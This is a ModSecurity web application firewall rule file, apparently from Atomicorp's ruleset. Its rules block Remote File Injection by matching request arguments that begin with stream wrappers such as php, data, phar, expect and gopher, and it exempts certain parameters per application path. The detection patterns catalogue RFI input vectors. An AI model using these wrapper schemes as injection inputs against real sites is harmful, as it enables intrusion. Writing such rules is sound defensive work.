SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pagename "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340663,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pagename "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340664,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91239

SecRule REQUEST_FILENAME "/cutenews/index\.php" "phase:2,id:91240,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91241,t:none,pass,nolog,skipAfter:END_RULES_91241"

SecRule ARGS|!ARGS:/http_script_dir/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:change_avatar|!ARGS:short_story "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340665,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/http_script_dir/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:change_avatar|!ARGS:short_story "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340666,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91241

SecRule REQUEST_FILENAME "/data/nanoadmin\.php" "phase:2,id:91242,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91243,t:none,pass,nolog,skipAfter:END_RULES_91243"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^areaContent/|!ARGS:content "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340667,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^areaContent/|!ARGS:content "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340668,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91243

SecRule REQUEST_FILENAME "/auctions/rsstml\.php" "phase:2,id:91244,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91245,t:none,pass,nolog,skipAfter:END_RULES_91245"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:XML "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340669,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:XML "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "id:340670,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91245

SecRule REQUEST_FILENAME "/install/util\.php" "phase:2,id:91246,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157"

SecRule REQUEST_FILENAME "/egroupware/index\.php" "phase:2,id:91247,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91248,t:none,pass,nolog,skipAfter:END_RULES_91248"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340672,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340673,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91248

SecRule REQUEST_FILENAME "/lclaccounts/setup/config\.php" "phase:2,id:91249,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91250,t:none,pass,nolog,skipAfter:END_RULES_91250"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:341672,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341673,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91250

SecRule REQUEST_FILENAME "/admin/post_property\.php" "phase:2,id:91251,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91252,t:none,pass,nolog,skipAfter:END_RULES_91252"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:map|!ARGS:photo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340674,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:map|!ARGS:photo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340675,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91252

SecRule REQUEST_FILENAME "/filemanager/browser/default/browser\.html" "phase:2,id:91253,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91254,t:none,pass,nolog,skipAfter:END_RULES_91254"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340676,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340677,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91254

SecRule REQUEST_FILENAME "/admin\.mvc" "phase:2,id:91255,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91256,t:none,pass,nolog,skipAfter:END_RULES_91256"

SecRule ARGS|!ARGS:/description/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/CFM_Fields/|!ARGS:Store_MvUPS_Server|!ARGS:/^Store_CustomerEmail_/|!ARGS:Store_OUI_GlobalHeader|!ARGS:Store_OUI_GlobalFooter|!ARGS:Store_OUI_InvoiceFooter "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340678,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/description/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/CFM_Fields/|!ARGS:Store_MvUPS_Server|!ARGS:/^Store_CustomerEmail_/|!ARGS:Store_OUI_GlobalHeader|!ARGS:Store_OUI_GlobalFooter|!ARGS:Store_OUI_InvoiceFooter "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340679,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91256

SecRule REQUEST_FILENAME "/delivery/ck\.php" "phase:2,id:91257,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91258,t:none,pass,nolog,skipAfter:END_RULES_91258"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:oaparam__bannerid|!ARGS:oaparams "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340680,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:oaparam__bannerid|!ARGS:oaparams "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340681,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91258

SecRule REQUEST_FILENAME "/proxy/index\.php" "phase:2,id:91259,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91260,t:none,pass,nolog,skipAfter:END_RULES_91260"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340682,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340683,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91260

SecRule REQUEST_FILENAME "^/imp/" "phase:2,id:91261,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91262,t:none,pass,nolog,skipAfter:END_RULES_91262"

SecRule ARGS|!ARGS:DefaultZDM|!ARGS:/http/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:subject|!ARGS:imapuser|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:u|!ARGS:message|!ARGS:/msg/|!ARGS:formData|!ARGS:form_img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340684,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:DefaultZDM|!ARGS:/http/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:subject|!ARGS:imapuser|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:u|!ARGS:message|!ARGS:/msg/|!ARGS:formData|!ARGS:form_img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340685,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91262

SecRule REQUEST_FILENAME "modules/mod_wowstatus/wowserverstatus\.php" "phase:2,id:91263,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:91264,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91265,t:none,pass,nolog,skipAfter:END_RULES_91265"

SecRule ARGS|!ARGS:/website/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/twitter/|!ARGS:/google/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:mode|!ARGS:message|!ARGS:remotelink|!ARGS:website|!ARGS:signature "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340686,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,deny,log,auditlog,status:403,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/website/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/twitter/|!ARGS:/google/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:mode|!ARGS:message|!ARGS:remotelink|!ARGS:website|!ARGS:signature "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,deny,log,auditlog,status:403,multimatch,id:340687,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91265

SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:91266,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91267,t:none,pass,nolog,skipAfter:END_RULES_91267"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340690,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340691,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91267

SecRule REQUEST_FILENAME "/sysadminarea\.php" "phase:2,id:91268,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91269,t:none,pass,nolog,skipAfter:END_RULES_91269"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/|!ARGS:/^update/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340692,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/|!ARGS:/^update/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340693,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91269

SecRule REQUEST_FILENAME "/download\.php" "phase:2,id:91270,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91271,t:none,pass,nolog,skipAfter:END_RULES_91271"

SecRule ARGS|!ARGS:/link/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file|!ARGS:referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340694,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/link/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file|!ARGS:referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340695,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91271

SecRule REQUEST_FILENAME "/net2ftp_installer\.php" "phase:2,id:91272,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91273,t:none,pass,nolog,skipAfter:END_RULES_91273"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:package "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340696,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:package "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340697,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91273

SecRule REQUEST_FILENAME "/mediaplayer\.swf" "phase:2,id:91274,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91275,t:none,pass,nolog,skipAfter:END_RULES_91275"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340698,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

